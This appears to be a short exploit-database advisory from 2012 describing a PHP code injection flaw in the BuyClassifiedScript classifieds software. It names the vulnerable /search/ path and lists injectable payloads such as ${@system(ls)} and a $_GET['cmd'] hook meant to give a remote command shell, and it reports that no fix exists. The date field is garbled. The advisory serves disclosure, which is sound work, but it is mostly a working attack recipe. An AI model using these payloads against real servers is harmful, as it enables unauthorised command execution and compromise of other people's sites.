BuyClassifiedScript PHP Code Injection Vulnerability

2012-11-26 15:05:54

# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on:Windows 7
# Blog: d3b4g.me




----------------------------------------------------------------------------------

This vulnerability allows an attacker to inject custom code
into the server side scripting engine.It's possible to get a remote cmd by taking
advantage of this vulnerability.


Vulnerable function:

/search/


() php code excution :


http://localhost/path/search {Inject malicious code}


() example of code you can inject:


// ${@system(ls)}

${@print(hello)}

$_GET['cmd']


//



-end-

Fixes

No fixes

In order to submit a new fix you need to be registered.